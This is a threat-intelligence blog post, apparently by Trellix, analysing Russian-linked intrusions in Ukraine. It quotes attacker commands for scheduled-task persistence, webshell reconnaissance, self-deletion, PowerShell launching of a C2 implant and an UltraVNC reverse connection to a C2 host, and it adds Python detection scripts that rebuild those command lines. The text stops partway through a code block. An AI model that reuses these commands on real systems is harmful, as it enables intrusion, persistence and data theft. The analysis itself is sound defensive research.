# Growling Bears Make Thunderous Noise
By Trellix · June 6, 2022
Per public attribution, Russian cybercriminal groups have been active for many years. Their tactics, techniques, and procedures (TTPs) have evolved only gradually, although some changes have been observed. Lately, the threat landscape has changed as several previously separate domains have partially merged. This trend was already under way, but the increased digital activity around the conflict has accelerated and exposed it. This paper covers the evolution of cybercrime over time, the impact of a (cyber)war, observed activity, and finally a call to action.
## Cybercriminal evolutions over time
The changes over time can be split into multiple evolutions, where each evolution is based on the one prior. This section provides insight into these evolutions, in chronological order. As these events unfolded organically, it is important to note that there is no exact date when one transformed into another. The goal here is to provide a further understanding of the historic events which occurred prior to the latest, and still ongoing, transformation.
Whenever there is money to be made, there are people willing to risk it all. Some aren't shy about breaking the law to gather a fortune; although each criminal's methods differ, the result is the same. The digital world is no exception, and one can argue that the anonymous nature of online interactions acts as an accelerant. Most offenders operate opportunistically: a server that hasn't been patched for years makes an easy target, especially when publicly available tooling exists to exploit the vulnerabilities found on it.
## Organized cybercrime
The next step, as is also seen in traditional crime, is for individuals to organize themselves. The more generalist nature of the original cybercriminals required defenders to uphold a certain level of security. The bundling of forces allows individuals to branch out into a specific area of expertise. As such, the previously set security standards become insufficient, thus requiring blue teams to raise the bar. With the additional knowledge, groups can exploit vulnerabilities based on incomplete write-ups or partial proof-of-concepts. Their targets are still opportunity based, allowing the actors to target a wider variety of potential victims. The path of the least resistance is generally the most profitable here.
## Nation state campaigns
Nation state campaigns are often set up with a different goal than (organized) cybercrime. Usually, such actors conduct online espionage, potentially along with in-person espionage. These groups are commonly characterized by their advanced methods, their persistent nature, and the threat they pose, commonly summarized as an Advanced Persistent Threat, abbreviated as APT. Their goal is to complete the set objective(s), without solely relying on opportunity.
Naturally, misconfigured machines and publicly available exploits provide ample opportunities to these groups, as can be seen with the ProxyLogon and ProxyShell vulnerabilities and their aftermath. These groups are, in contrast to most (organized) cybercrime, able to find their own way into a given target. The more advanced nation states are capable of finding vulnerabilities and creating their own exploits for them, ahead of the general public. This makes such an attack difficult to defend against, and the relentless nature of these groups drags the battle between the attacking and defending groups on, until the victim is either compromised, or no longer of strategic value for the attacker.
Additionally, nation state backed groups do not always opt to profit directly from their activity. Taking systems hostage with ransomware, or simply wiping them using a wiper, imposes a cost on victims as they need to restore their systems, deal with downtime, and ensure the integrity of the (seemingly) unaffected systems.
## Merging domains
There has long been speculation about nation state involvement in (organized) cybercrime. This is difficult to prove in general, and even where some proof exists, skeptics continue to poke holes in the attribution. The leak of the Conti chats, discussed further below, provided solid evidence of that group's ties with the Russian government. Evidence of this volume is a first and allows analysts to read the exact conversations between actors. The criminals benefit from a form of "immunity", whereas the nation state benefits from operations carried out under the flag of the criminal actor. Especially when the partner is a ransomware gang such as Conti, the encrypted systems leave little trace of the intrusion and of the activity on the system, which further masks what was done there.
Since many Ukrainian government sites were taken offline by suspected Russian actors in January 2022, Trellix Threat Labs has seen many parties become involved, from civilian groups such as the various "anonymous" movements, to semi-government-sponsored groups like the "Ukrainian Cyber Army", to nation-state groups that disrupt communication and infrastructure. Each of them leverages open-source adversary tooling, which makes it difficult to attribute attacks to one or more specific groups. The image below shows the distinct groups, and the most prevalent attack methods, that Trellix Threat Labs has observed over time. They are categorized into "AN_" groups, the anonymous-movement-like groups; "Pro_" groups, which conduct attacks showing allegiance to one of the countries involved in the conflict; and "APT_" groups, the nation-state-sponsored groups.
![Overview of groups involved in the conflict.](https://www.trellix.com/en-us/img/newsroom/stories/growling-bears-make-thunderous-noise-1.jpg) Figure 1. Overview of groups involved in the conflict.
As one can imagine, tracking activities on the social media platforms many of these groups are using can be challenging. From the information posted, one must consider: is it reliable, is it misinformation, is it propaganda, are images or data manipulated or backdoored?
With these attacks happening, the barriers traditionally seen between the different types of actor are blurring. As the barriers fade, filling out a Diamond Model of Intrusion Analysis for the actors involved becomes more complicated, because they share tools, techniques and targets.
![Fading barriers](https://www.trellix.com/en-us/img/newsroom/stories/growling-bears-make-thunderous-noise-2.jpg) Figure 2. Fading barriers
As illustrated earlier, the Conti ransomware group's public stance on the Russian invasion of Ukraine cost them: their data was leaked, providing researchers not only with the aforementioned chats but also with a copy of the ransomware's source code. A pro-Ukrainian group, dubbed NB65, then took this source code, modified it, and started attacking targets in Russia. Ransomware actors normally leave their own region untouched, a small price to pay for the resulting lack of police interest, which makes attacks on Russian targets with Conti-derived code rather unheard of. Below is a screenshot of NB65's ransom note.
![Ransom note](https://www.trellix.com/en-us/img/newsroom/stories/growling-bears-make-thunderous-noise-3.jpg) Figure 3. Ransom note
Cybercriminal groups could have been used to obtain access credentials for potential targets. The leaked Conti chats show that the group was in contact with government officials who asked for "information" on compromised networks. Why spend resources obtaining credentials when one can ask a cybercrime group for access and offer "protection" in return? Once long-term access has been established, intelligence can be exfiltrated and, during a conflict, disruptive actions can be executed, as described in the next section.
## The impact of (cyber)war
With the ever-increasing intertwining of our digital and physical lives, the impact of a (digital) war is increasing day by day. There was a lot of speculation about a "full blown cyberwar" prior to the Russian invasion. Something can be said in favor of these arguments, but when missiles explode in your vicinity, computers aren't that interesting anymore. Once the most direct danger has passed, however, the digital domain is vital to communicate securely and in a timely manner. It is also a safe way to perform reconnaissance, in contrast to sending a squad to scout a hostile area.
To support our customers and the people of Ukraine, Trellix Threat Labs coordinated with multiple government institutions to provide them with the necessary telemetry insights, intelligence briefings and analysis of the malware tools used by Russian actors. A large portion of Trellix's efforts were performed discreetly, as protection of our customers is our highest priority.
## Observed activity
Just as physical warfare uses a multitude of military tactics and equipment, Trellix Threat Labs has observed similar activity on the cyber front, including but not limited to wipers, spear-phishing, backdoors, exploitation of vulnerabilities, and many other techniques. In the following sections, several of these activities are highlighted, along with the attributed actors.
Initially, we observed different groups using several tactics to gain access, gather information and credentials, and establish and maintain access to the victim's networks. The visualization below shows which groups were observed, along with their initial attack modus operandi, after which they determined their next steps.
![Initial attack techniques used by observed groups](https://www.trellix.com/en-us/img/newsroom/stories/growling-bears-make-thunderous-noise-4.jpg) Figure 4. Initial attack techniques used by observed groups
Over the years, the pro-Russian Gamaredon group has been digitally operating in Ukraine. Their targets are mostly national institutes and government entities, based on Trellix Labs' observations.
From February to March 2022, we observed a Word document, attached to a spear-phishing e-mail, crafted to look like a legitimate Ministry of Foreign Affairs document while carrying a VBS script that downloads and installs a persistent file on the victim's machine.
![Attack overview Gamaredon using backdoored Office documents](https://www.trellix.com/en-us/img/newsroom/stories/growling-bears-make-thunderous-noise-5.jpg) Figure 5. Attack overview Gamaredon using backdoored Office documents
![Example of the document](https://www.trellix.com/en-us/img/newsroom/stories/growling-bears-make-thunderous-noise-6.jpg) Figure 6. Example of the document
After opening this document, the script in the macro code was executed:
![Macro code example](https://www.trellix.com/en-us/img/newsroom/stories/growling-bears-make-thunderous-noise-7.jpg) Figure 7. Macro code example
Cleaning up the code, we observe the creation of a scheduled task. The schedule unit is set to minutes (/SC MINUTE) with a modifier of 12 (/MO 12), so the task fires every 12 minutes; /F silently overwrites an existing task of the same name:
_Wscript.exe launching "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 12 /F /tn Word.Downdloads /tr_
The scheduled task downloads the payload from this website:
After the download, the RAR file is renamed to a .exe file and saved as a .vbs file:
Unfortunately, the final payload was not available for analysis, but the intrusion pattern and macro code are similar to those observed by others investigating this same actor.
During that same timeframe, we observed a similar document used to target victims. Although both documents carry dates (based on metadata, which we realize can be manipulated), this could either be a case of simulating an attack or of re-using the same modus operandi with adjusted payloads.
When the macro is executed in the second document, it follows the below steps:
* Winword.exe creating the file
* Wscript.exe launching the process schtasks.exe with command line
  "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 12 /F /tn Word.Downdloads /tr C:\Users\
* Wscript.exe launching the process schtasks.exe with command line
  "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 15 /F /tn
* Downloads the payload from hxxp://cornelius.website/WindowsNewsense.php
* Appends and creates the file "IndexOffice.vbs"
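The chain above (Office application, script host, schtasks.exe) is a good detection anchor. The following added example, which is not Trellix's code, parses schtasks /Create command lines into a schedule period and flags task creation whose process ancestry contains a script host running under an Office application. The events are constructed, not telemetry; the /tr action, file names and PIDs are assumptions, since the page's own command line is truncated.

```python
import shlex
from typing import Optional

# Process names that indicate a script host was launched from an Office application.
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe", "powershell.exe"}

# Constructed process-creation events (not real telemetry) modelled on the chain above.
# The /tr action, file names and PIDs are assumptions: the page's command line is truncated.
EVENTS = [
    {"pid": 1001, "ppid": 900,
     "image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "cmdline": r'"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE" /n "C:\Users\u\Downloads\MFA_letter.docm"'},
    {"pid": 1002, "ppid": 1001, "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r'"C:\Windows\System32\wscript.exe" "C:\Users\u\AppData\Local\Temp\IndexOffice.vbs"'},
    {"pid": 1003, "ppid": 1002, "image": r"C:\Windows\System32\schtasks.exe",
     "cmdline": r'"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 12 /F /tn Word.Downdloads '
                r'/tr "wscript.exe //B C:\Users\u\AppData\Local\Temp\IndexOffice.vbs"'},
    # Benign control: an administrator creating a nightly task from an interactive shell.
    {"pid": 2001, "ppid": 1, "image": r"C:\Windows\System32\cmd.exe", "cmdline": "cmd.exe"},
    {"pid": 2002, "ppid": 2001, "image": r"C:\Windows\System32\schtasks.exe",
     "cmdline": r'schtasks /Create /SC DAILY /ST 02:00 /tn NightlyBackup /tr "C:\Tools\backup.exe"'},
]

# Minutes per schedule unit, for the units where a fixed period is meaningful.
UNIT_MINUTES = {"minute": 1, "hourly": 60, "daily": 1440}


def image_name(path: str) -> str:
    """Lower-cased file name of a Windows image path."""
    return path.rsplit("\\", 1)[-1].lower()


def parse_schtasks_create(cmdline: str) -> Optional[dict]:
    """Return the /Create parameters of a schtasks command line, or None if it is not a /Create.

    posix=False keeps Windows quoting intact: a quoted /tr action containing spaces stays one
    token and backslashes are not treated as escapes.
    """
    tokens = shlex.split(cmdline, posix=False)
    lowered = [t.lower() for t in tokens]
    if "/create" not in lowered:
        return None
    params = {}
    i = 0
    while i < len(tokens):
        if lowered[i] in ("/sc", "/mo", "/tn", "/tr", "/st") and i + 1 < len(tokens):
            params[lowered[i][1:]] = tokens[i + 1].strip('"')
            i += 2
        else:
            i += 1
    unit = UNIT_MINUTES.get(params.get("sc", "").lower())
    if unit is not None:
        # /MO multiplies the unit and defaults to 1 when absent.
        params["period_minutes"] = unit * int(params.get("mo", "1"))
    return params


def ancestors(by_pid: dict, pid: int) -> list:
    """Image names of a process's parents, nearest first, as far as the event set allows."""
    chain = []
    while pid in by_pid:
        chain.append(image_name(by_pid[pid]["image"]))
        pid = by_pid[pid]["ppid"]
    return chain


def find_office_spawned_tasks(events: list) -> list:
    """Flag schtasks /Create commands whose ancestry has a script host under an Office app."""
    by_pid = {e["pid"]: e for e in events}
    hits = []
    for e in events:
        if image_name(e["image"]) != "schtasks.exe":
            continue
        params = parse_schtasks_create(e["cmdline"])
        if params is None:
            continue
        chain = ancestors(by_pid, e["ppid"])
        if any(p in SCRIPT_HOSTS for p in chain) and any(p in OFFICE_APPS for p in chain):
            hits.append({"pid": e["pid"], "task": params.get("tn"), "action": params.get("tr"),
                         "period_minutes": params.get("period_minutes"), "chain": chain})
    return hits


if __name__ == "__main__":
    for hit in find_office_spawned_tasks(EVENTS):
        print(f"pid {hit['pid']}: task {hit['task']!r} every {hit['period_minutes']} min "
              f"via {' <- '.join(hit['chain'])}: {hit['action']}")
```

The benign control task is parsed but not flagged because its ancestry lacks both an Office application and a script host; a short period combined with a /tr action that points at a script host in a user-writable directory is what makes the Gamaredon task stand out.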
## Phishing the Ukrainian Ministry of Defense
In March, we observed several phishing attempts impersonating the Ministry of Defense of Ukraine. One email, sent on March 23rd, had the subject "Доступний новий ресурс" ("A new resource is available" in English) and was sent to at least 42 recipients. The URL in the message pointed to hxxp://file-milgov[.]systems/ and the domain resolved to the IP 93.95.227[.]226, which belongs to a hosting provider in Iceland. We were not able to identify who set up these campaigns. In the bigger picture of the tactics and techniques observed, this is another example of how adversaries attempt to obtain credentials for victim networks.
Upon closer inspection, the webpage asks for a username and password and identifies itself as "Міністерство Оборони України Файлове сховище", which translates to "Ministry of Defense of Ukraine File Storage" in English.
![Fake login page](https://www.trellix.com/en-us/img/newsroom/stories/growling-bears-make-thunderous-noise-8.jpg) Figure 8. Fake login page
When a user fills in credentials, the webpage responds with a small error message at the bottom of the page: "Невдала спроба входу", which translates to "Unsuccessful login attempt".
![The error message](https://www.trellix.com/en-us/img/newsroom/stories/growling-bears-make-thunderous-noise-9.jpg) Figure 9. The error message
The same server had other error pages which mimicked an internal error: "Вибачте, на сервері ще ведуться технічні роботи", which translates to "Sorry, the server is still undergoing technical work" in English.
![Different Error message found on the server ](https://www.trellix.com/en-us/img/newsroom/stories/growling-bears-make-thunderous-noise-10.jpg) Figure 10. Different Error message found on the server
![Another suspected Phishing page.](https://www.trellix.com/en-us/img/newsroom/stories/growling-bears-make-thunderous-noise-11.jpg) Figure 11. Another suspected Phishing page.
The IP address 82.221.139[.]137 was observed in other spear phishing campaigns impersonating the cybersecurity center and CSOC in Ukraine.
Communication is vital to survive during wartime, and the adversarial use of malware to "wipe" communication systems has been widespread in the region. A wiper's sole purpose is to destroy the device it is executed on, and potentially other connected devices. If the execution is successful, the device is rendered useless: whether back-ups are available or not, the machine does not function at all. The recovery of a single machine might not take long, but the restoration of a company or government-wide attack may take months and cause disruption when communication, access to data, and coordination are critical.
When actors choose to use a wiper, they know that the weapon may be used against them. Aside from the damage, it is often used as propaganda to demonstrate how "weak" the enemy's defenses are. In the diagram below, the different wiper families observed since the start of the conflict, including attribution, are visualized. Ember Bear and APT28 are Russian nation state actor groups; the other groups are likely pro-Russian or pro-Ukrainian, but not enough evidence is available to make those claims solid.
![Wiper families and their attribution](https://www.trellix.com/en-us/img/newsroom/stories/growling-bears-make-thunderous-noise-12.jpg) Figure 12. Wiper families and their attribution
It's important to understand that to deploy a wiper, the actor needs raw access to the physical disk, which requires administrator or SYSTEM privileges. We have observed actors using trusted tools and stolen certificates, mimicking ransomware, and employing several tactics to keep these attack tools from being detected and to ensure that their access to the network remains available.
In one example, Trellix Threat Labs observed an actor access a victim's network with the intent to wipe their systems. When the first wiper (dubbed WhisperGate) failed to execute, it took the actors only two and a half hours to deploy another wiper (HermeticWiper) instead.
## Targeted exchange servers
One of our Ukrainian clients also detected activity in March 2022 in which vulnerabilities were used to attack the internal network and the output was stored in a file reachable from the Internet. In the command lines below, the actor gathers information about the system and writes the output of each command to the file "owafont_ua.css", stored under the Outlook Web Access (OWA) resources that the Exchange server serves over HTTP.
Checking the content of the "usoshared" folder, which belongs to the Windows Update mechanism (the Update Session Orchestrator), we found that it mostly contains .etl files, Event Trace Log files written by Event Tracing for Windows, including the kernel logger:
c:\windows\system32\cmd.exe /c dir c:\programdata\usoshared > "C:\Program Files\Microsoft\Exchange
Here the attacker lists all scheduled tasks on the system with full details (/v):
c:\windows\system32\cmd.exe /c schtasks /query /v > "C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\current\themes\resources\owafont_ua.css"
Collecting OS version, patch level and domain membership:
c:\windows\system32\cmd.exe /c systeminfo > "C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\current\themes\resources\owafont_ua.css"
Listing running processes:
c:\windows\system32\cmd.exe /c tasklist >> "C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\current\themes\resources\owafont_ua.css"
Querying active TCP connections on the victim's system, including the owning process (-b):
c:\windows\system32\cmd.exe /c netstat -anbp tcp >> "C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\current\themes\resources\owafont_ua.css"
Showing the ARP table/cache on the host to discover more hosts on the network:
c:\windows\system32\cmd.exe /c arp -a >> "C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\current\themes\resources\owafont_ua.css"
These commands were executed in such rapid succession that they must have been issued through a webshell stored on that same Exchange server. Note that the first three commands overwrite the file (>) while the remaining ones append to it (>>).
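The sequence above suggests a simple detection, shown here as an added example that is not Trellix's code: a command launched by the IIS worker process that redirects its output into a directory Exchange serves over HTTP, plus a burst of such commands against one file. The events and timestamps are constructed, and the w3wp.exe parent is an assumption; the page only states that a webshell on the same server issued the commands.

```python
import re
from datetime import datetime, timedelta

# Directories Exchange serves over HTTP: a file written here is reachable from the Internet.
EXCHANGE_WEB_ROOTS = (
    r"c:\program files\microsoft\exchange server\v15\frontend\httpproxy",
    r"c:\program files\microsoft\exchange server\v15\clientaccess",
)
OUT = (r"C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy"
       r"\owa\auth\current\themes\resources\owafont_ua.css")

# Constructed process-creation events (timestamp, parent image, command line), not Trellix
# telemetry. The w3wp.exe parent (IIS worker process) and the timestamps are assumptions.
EVENTS = [
    ("2022-03-14T09:12:01", "w3wp.exe", rf'c:\windows\system32\cmd.exe /c dir c:\programdata\usoshared > "{OUT}"'),
    ("2022-03-14T09:12:04", "w3wp.exe", rf'c:\windows\system32\cmd.exe /c schtasks /query /v > "{OUT}"'),
    ("2022-03-14T09:12:09", "w3wp.exe", rf'c:\windows\system32\cmd.exe /c systeminfo > "{OUT}"'),
    ("2022-03-14T09:12:15", "w3wp.exe", rf'c:\windows\system32\cmd.exe /c tasklist >> "{OUT}"'),
    ("2022-03-14T09:12:18", "w3wp.exe", rf'c:\windows\system32\cmd.exe /c netstat -anbp tcp >> "{OUT}"'),
    ("2022-03-14T09:12:21", "w3wp.exe", rf'c:\windows\system32\cmd.exe /c arp -a >> "{OUT}"'),
    # Benign control: a maintenance script logging outside the web roots.
    ("2022-03-14T11:40:00", "powershell.exe",
     r"c:\windows\system32\cmd.exe /c systeminfo > C:\ExchangeSetupLogs\inventory.txt"),
]

# Output redirection target: a quoted path with spaces or a bare token.
REDIRECT = re.compile(r'>{1,2}\s*(?:"([^"]+)"|(\S+))')


def redirect_target(cmdline: str):
    """File that a cmd.exe command line redirects its output into, or None."""
    m = REDIRECT.search(cmdline)
    return (m.group(1) or m.group(2)) if m else None


def is_web_served(path: str) -> bool:
    """True if the path lies under a directory the Exchange front end serves over HTTP."""
    return path.lower().startswith(EXCHANGE_WEB_ROOTS)


def find_webshell_recon(events, window=timedelta(seconds=60), min_burst=3):
    """Return (hits, bursts).

    hits:   commands spawned by the IIS worker whose output lands in a web-served path.
    bursts: runs of such commands against the same file, each within `window` of the previous
            one, with at least `min_burst` members (the rapid-fire pattern described above).
    """
    hits = []
    for ts, parent, cmd in events:
        target = redirect_target(cmd)
        if parent.lower() == "w3wp.exe" and target and is_web_served(target):
            hits.append({"time": datetime.fromisoformat(ts), "target": target, "cmd": cmd})
    bursts = []
    for h in sorted(hits, key=lambda h: h["time"]):
        last = bursts[-1] if bursts else None
        if last and last["target"].lower() == h["target"].lower() and h["time"] - last["last"] <= window:
            last["count"] += 1
            last["last"] = h["time"]
        else:
            bursts.append({"target": h["target"], "first": h["time"], "last": h["time"], "count": 1})
    return hits, [b for b in bursts if b["count"] >= min_burst]


if __name__ == "__main__":
    hits, bursts = find_webshell_recon(EVENTS)
    for b in bursts:
        print(f"{b['count']} commands wrote to {b['target']} between {b['first']} and {b['last']}")
```

The same idea works without process telemetry: list files under the FrontEnd\HttpProxy and ClientAccess trees modified in the last days and inspect any .css, .js or .aspx whose contents are command output rather than markup.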
In April 2022, Trellix Labs observed indicators which the Ukrainian CERT has attributed to the Russian threat group UAC-0056. The attack primarily targeted the Ukrainian government and energy sector.
Malicious Excel documents were sent as attachments from a compromised email account. Once the document was opened, either embedded code would be constructed and executed, or the next stage would be downloaded from the Internet. The next stage ranged from custom implants to Cobalt Strike beacons; compromised sites, Discord servers, and pre-staged domains were observed hosting them. The implants, known as GraphSteel and GrimPlant, steal user credentials and network information and exfiltrate it in encrypted form to the C2 over gRPC, Google's high-performance Remote Procedure Call framework.
![Attack overview GraphSteel and Grimplant](https://www.trellix.com/en-us/img/newsroom/stories/growling-bears-make-thunderous-noise-13.jpg) Figure 13. Attack overview GraphSteel and Grimplant
On April 18, 2022, a malicious email, presumably from a compromised ukr[.]net account, with the subject "ua_report", was observed on one of our email gateways. The email attempted to lure the victim into opening the attached compressed file with the line "Operation 'The Eye of Sauron' results", followed by the password needed to open the attachment.
![Attack flow overview APT28 attack](https://www.trellix.com/en-us/img/newsroom/stories/growling-bears-make-thunderous-noise-14.jpg) Figure 14. Attack flow overview APT28 attack
Once executed, the password-protected self-extracting RAR drops on the system an executable called "Doc_Viewer.exe" or "DocumentSaver.exe" and a DLL called "SQLite.Interop.dll". The executable is a .NET infostealer which uses the bundled DLL to read various browsers' SQLite databases and extract the stored credentials and cookies. This activity was reported by Google's TAG and attributed to the infamous APT28, aka Fancy Bear, a threat actor known for its ties with the Russian GRU.
On execution the infostealer removes its traces by deleting the SQLite DLL and the malicious executable, as can be seen in the commands below.
cmd.exe /C Del SQLite.Interop.dll
cmd.exe /C Del C:\Users\***\AppData\Local\Temp\RarSFX0\Doc_Viewer.exe
This is an example of the .NET malware stealing credentials, more specifically trying to obtain the cookies stored in the Firefox database. Cookies can contain session tokens that can be abused to hijack the user's session and impersonate that user.
![Code example of grabbing cookie values](https://www.trellix.com/en-us/img/newsroom/stories/growling-bears-make-thunderous-noise-15.jpg) Figure 15. Code example of grabbing cookie values
After it has finished gathering stolen credentials, the .NET sample uses compromised IMAP credentials embedded in the sample to exfiltrate the stolen information. We observed the following compromised accounts being used to connect to the indicated IMAP servers:
On May 9, 2022, a government client in Ukraine received a spear phishing email at one of its general email addresses. The email pointed to a catalog included in a zip archive hosted at the Google Drive URL drive.google[.]com/file/d/1JBYjdNp5NnvJyYtR5azWBuRZZIjhto9z. To open the archive, the recipient needs a password ("ifYQFl", without quotes), which is given in the body of the e-mail, as can be seen below.
(Translated from Ukrainian.)
_Good afternoon, my name is Andriy, I am an employee of the State Concern "Ukroboronprom". As of today we have a need to replenish supplies; in particular, parts for APCs and ammunition for small arms are currently needed. I was given your contact and was told that you could assist in this matter. As far as the legal side is concerned, we will send you official letters. Please check in the archive whether you have components that you can provide to us._
_Password for the archive: ifYQFl_
_Необхідні частини.zip ("Necessary parts.zip")_
![Attack Flow Overview DoubleDrop](https://www.trellix.com/en-us/img/newsroom/stories/growling-bears-make-thunderous-noise-16.jpg) Figure 16. Attack Flow Overview DoubleDrop
The LNK file invokes PowerShell with a base64-encoded command that runs in a hidden window. The decoded command is given below.
Start-Process -FilePath "$env:temp\helper.exe" -ArgumentList "--host 188.8.131.52 --port 4433" -WindowStyle Hidden;
The newly created web client is used to download the "helper.exe" file into the temporary directory from the given URL. Note that the added bracket is not present in the original script but is used to defang the URL in this article. The downloaded executable is then started as a new process with a hidden window and four arguments specifying the host and port to use. Finally, the LNK file that started this execution chain is deleted.
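PowerShell's -EncodedCommand is base64 over UTF-16LE, not UTF-8, which trips up many ad-hoc decoders. The added example below, which is not the actor's script and not Trellix's code, re-encodes the decoded Start-Process line above the way PowerShell expects, then decodes it back from a constructed LNK-style command line and extracts the launched binary and the host/port arguments. The download step of the original script is not reproduced, and the powershell.exe flags in the sample command line are assumptions.

```python
import base64
import re

# The decoded Start-Process line from the page, used here as constructed input.
DECODED = ('Start-Process -FilePath "$env:temp\\helper.exe" '
           '-ArgumentList "--host 188.8.131.52 --port 4433" -WindowStyle Hidden;')


def encode_powershell(command: str) -> str:
    """Encode a script the way -EncodedCommand expects: UTF-16LE first, then base64."""
    return base64.b64encode(command.encode("utf-16-le")).decode("ascii")


def decode_powershell(encoded: str) -> str:
    """Inverse of encode_powershell. Decoding the bytes as UTF-8 instead yields NUL-riddled text."""
    return base64.b64decode(encoded).decode("utf-16-le")


# The common spellings PowerShell accepts for -EncodedCommand, followed by the base64 blob.
ENC_FLAG = re.compile(r"\s-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)
START_PROCESS = re.compile(r'Start-Process\s+-FilePath\s+"([^"]+)"\s+-ArgumentList\s+"([^"]+)"', re.I)
HOST_PORT = re.compile(r"-{1,2}host\s+(\S+)\s+-{1,2}port\s+(\d+)", re.I)


def analyze_lnk_command(cmdline: str):
    """Decode a powershell -EncodedCommand and pull out the launched file and its C2 host/port.

    Returns None when the command line carries no encoded command.
    """
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    script = decode_powershell(m.group(1))
    sp = START_PROCESS.search(script)
    if not sp:
        return {"script": script}
    hp = HOST_PORT.search(sp.group(2))
    return {
        "script": script,
        "file": sp.group(1),
        "host": hp.group(1) if hp else None,
        "port": int(hp.group(2)) if hp else None,
    }


# Constructed LNK target command line (flags assumed) carrying the encoded script.
SAMPLE_CMDLINE = f"powershell.exe -WindowStyle Hidden -NoProfile -enc {encode_powershell(DECODED)}"

if __name__ == "__main__":
    print(analyze_lnk_command(SAMPLE_CMDLINE))
```

The decoded script, the dropped file name and the host/port pair are the three fields worth indexing from LNK and process-creation telemetry; the base64 blob itself changes with every whitespace edit and is a poor indicator.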
Investigating one of the endpoints, we observe the following path:
_C:\Users\*********\AppData\Local\Temp\helper.exe" --host 184.108.40.206 --port 4433_
The "helper.exe" binary is written in Go. Several anti-analysis tricks, such as string obfuscation and garbage code, have been applied to make analysis of this binary more challenging.
From the log files we observed that "helper.exe" queries system information from the registry and sends it to the C2 server. Information from the web browser, such as cookies, form history and passwords, is gathered and forwarded as well. From the traffic analysis we can observe that the C2 server hosted a dedicated "data" endpoint for it:
_Post "https://46.229.215[.]108:4433/data": write tcp X.X.X.X:49202->220.127.116.11:4433: wsasend_
At the same time a batch script is dropped; once the initial information has been gathered, it kills the helper process, waits two seconds, and deletes helper.exe and the batch script itself. The lines of the batch file (note that taskkill's /IM switch expects an image name, yet the script passes what looks like a process ID) and the cmd.exe command line that runs it:
chcp 65001
TaskKill /F /IM 3796
Timeout /T 2 /Nobreak
Del /a
cmd.exe "/C C:\Users\***\AppData\Local\Temp/1.bat & Del 1.bat"
Overall, we observed a well-organized operation, with many components designed to evade detection while gathering information that can be used to compromise the victim further and gain deeper access to the network.
## Gamaredon activity
Trellix Threat Labs detected the presence of an UltraVNC remote administration tool on the system of one of our Ukrainian customers. Remote admin tools are often used to bypass security controls. The executable was discovered in the following path:
Pivoting from our initial data, we found the parent SFX archive file.
![Attack Flow Overview](https://www.trellix.com/en-us/img/newsroom/stories/growling-bears-make-thunderous-noise-17.jpg) Figure 17. Attack Flow Overview
The self-extracting archive has the following commands:
![SFX Config Options](https://www.trellix.com/en-us/img/newsroom/stories/growling-bears-make-thunderous-noise-18.jpg) Figure 18. SFX Config Options
This will essentially extract the files in the archive to %APPDATA% folder and then execute the 14991.cmd batch file.
The contents of the 14991.cmd batch file is as follows:
![Contents of the 14991.cmd file](https://www.trellix.com/en-us/img/newsroom/stories/growling-bears-make-thunderous-noise-19.jpg) Figure 19. Contents of the 14991.cmd file
This copies 31850.ini to wuauclt.exe and starts wuauclt.exe with the following command line:
"%CD%\wuauclt.exe" -autoreconnect -id:%RANDOM% -connect torrent-vnc.ddns[.]net:5612
The purpose of each of these command line options is as follows:
* wuauclt.exe: the UltraVNC server disguised as Microsoft's Windows Update AutoUpdate client
* -autoreconnect: attempt to reconnect to the listening viewer if the connection drops
* -connect: reverse-connect to the repeater at the specified host and port; because the connection is initiated by the victim, this bypasses inbound firewall restrictions
* -id: a unique identifier for this UltraVNC server at the repeater. The advantage of the repeater setup is two-fold:
  * it accepts connections from multiple servers, so the attacker can use the same payload for all victims and can simply change the repeater C2 host to reuse the payload in a future campaign
  * the repeater acts as a proxy between the server and the viewer, masking the real host on which the attacker runs the UltraVNC viewer
UltraVNC.ini is the UltraVNC configuration file consumed by the UltraVNC server. The files rc4.key and MSRC4Plugin_for_sc.dsm are also consumed by the UltraVNC server to encrypt the VNC network traffic; RC4 is a broken cipher, but it is enough to keep the session out of reach of network content inspection.
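As an added example that is not Trellix's code, the function below takes the image path and command line of such a launch and reports what a responder cares about: a wuauclt.exe running outside System32, the -connect target and port, the repeater -id, and whether the host sits under a dynamic-DNS provider. The sample launch is constructed: %CD% and %RANDOM% are shown already expanded, the extraction directory is assumed to be %APPDATA%, the domain is refanged, and the dynamic-DNS suffix list and UltraVNC's default viewer port of 5500 are assumptions.

```python
import re

# Where the genuine Windows Update client lives; the sample runs from the SFX extraction dir.
LEGIT_WUAUCLT_DIR = r"c:\windows\system32"
# Dynamic-DNS providers often used for throwaway C2 names (assumption; extend as needed).
DYNDNS_SUFFIXES = (".ddns.net", ".no-ip.org", ".no-ip.com", ".hopto.org", ".duckdns.org")
# UltraVNC's default viewer listen port when -connect names a host without a port (assumption).
DEFAULT_VIEWER_PORT = 5500

# Constructed launch modelled on the SFX batch file above: %CD% expanded to the assumed
# %APPDATA% extraction directory, %RANDOM% expanded to a number, domain refanged.
SAMPLE_IMAGE = r"C:\Users\u\AppData\Roaming\wuauclt.exe"
SAMPLE_CMDLINE = (r'"C:\Users\u\AppData\Roaming\wuauclt.exe" -autoreconnect -id:25874 '
                  r'-connect torrent-vnc.ddns.net:5612')


def analyze_vnc_launch(image_path: str, cmdline: str) -> dict:
    """Masquerade check plus the UltraVNC reverse-connect options of a wuauclt.exe launch."""
    directory, _, name = image_path.rpartition("\\")
    name, directory = name.lower(), directory.lower()
    findings = {
        # The real wuauclt.exe lives in System32; the same name anywhere else is masquerading.
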